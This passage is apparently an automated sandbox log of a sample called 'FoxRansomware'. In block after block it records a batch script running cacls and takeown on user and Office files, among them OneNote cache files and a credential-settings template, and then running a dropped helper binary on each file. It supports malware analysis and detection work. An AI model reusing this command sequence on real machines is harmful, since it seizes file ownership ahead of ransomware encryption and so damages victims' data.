    C:\Windows\SysWOW64\cacls.exe [PID 7448]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7444]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 7812]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000G.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7104]  fjPLyeD8.exe -accepteula "0000000G.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7412]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 2692]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 7940]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5600]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 6948]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000R.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 3708]  fjPLyeD8.exe -accepteula "0000000R.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6956]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5444]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5392]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5536]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 8104]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000015.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 3712]  fjPLyeD8.exe -accepteula "00000015.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5852]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5372]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 6028]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6000]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 4496]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000005.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5732]  fjPLyeD8.exe -accepteula "00000005.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6132]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 1468]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5944]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 2612] [Modifies file permissions]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 6840]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000I.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5860]  fjPLyeD8.exe -accepteula "0000000I.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5036]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 2132]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 4340]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5084]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 2028]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000T.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5128]  fjPLyeD8.exe -accepteula "0000000T.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 4704]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 4200]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 7040]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 4524]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 4020]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000017.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 3160]  fjPLyeD8.exe -accepteula "00000017.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5812]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 6580]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""
    C:\Windows\SysWOW64\cacls.exe [PID 8080]  cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5980]  takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"
    C:\Windows\SysWOW64\cmd.exe [PID 3744]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "settings.dat" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6984]  fjPLyeD8.exe -accepteula "settings.dat" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6916]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 6444]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5940]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 1488] [Modifies file permissions]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 4856]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006H.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5712]  fjPLyeD8.exe -accepteula "0000006H.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5764]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 4312]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
    C:\Windows\SysWOW64\cacls.exe [PID 5876]  cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7844]  takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    C:\Windows\SysWOW64\cmd.exe [PID 4896]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 3000]  fjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5668]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 1428]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 5132]  cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7136] [Modifies file permissions]  takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 6324]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6400]  fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 4148]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7096]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 6160]  cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6256]  takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 5192]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6544]  fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 2220]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 6252]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 6648]  cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6288]  takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 6280]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6668]  fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6304]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 6356]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 7064]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5300]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 5216]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006J.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7272]  fjPLyeD8.exe -accepteula "0000006J.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6188]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7736]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 6452]  cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5532]  takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 3168]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 8136]  fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 3900]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 2100]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
    C:\Windows\SysWOW64\cacls.exe [PID 8108]  cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5396]  takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    C:\Windows\SysWOW64\cmd.exe [PID 7008]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6900]  fjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6244]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 4932]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5464]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6780]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 7468]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000075.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6464]  fjPLyeD8.exe -accepteula "00000075.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7212]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 6108]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 3200]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7024]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 7544]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007R.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 940]  fjPLyeD8.exe -accepteula "0000007R.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 4192]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 5276]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 7128]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5848]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 6096]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000085.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7744]  fjPLyeD8.exe -accepteula "00000085.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5868]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 2012]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 2676]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 6296]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 7728]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008R.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6848]  fjPLyeD8.exe -accepteula "0000008R.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7312]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7772]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5656]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7120]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 8028]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000083.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7912]  fjPLyeD8.exe -accepteula "00000083.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7592]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7252]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 8024]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 2292]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 7796]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009H.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7904]  fjPLyeD8.exe -accepteula "0000009H.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7156]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 660]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5168]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 2248]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 3264]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AD.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7900]  fjPLyeD8.exe -accepteula "000000AD.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7440]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7376]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5596]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7260]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 3708]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AN.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5524]  fjPLyeD8.exe -accepteula "000000AN.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7452]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 8064]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 4864]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 7652]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 5404]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B3.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5852]  fjPLyeD8.exe -accepteula "000000B3.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 5444]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 7732]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5784]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5904] [Modifies file permissions]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 4496]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009F.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 7684]  fjPLyeD8.exe -accepteula "0000009F.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 2804]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 3012]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 2612]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe [PID 5860]  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"
    C:\Windows\SysWOW64\cmd.exe [PID 4476]  C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AL.bin" -nobanner
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 6728]  fjPLyeD8.exe -accepteula "000000AL.bin" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe [PID 992]  fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

C:\Windows\SysWOW64\cmd.exe [PID 6764]  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""
    C:\Windows\SysWOW64\cacls.exe [PID 5776]  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C
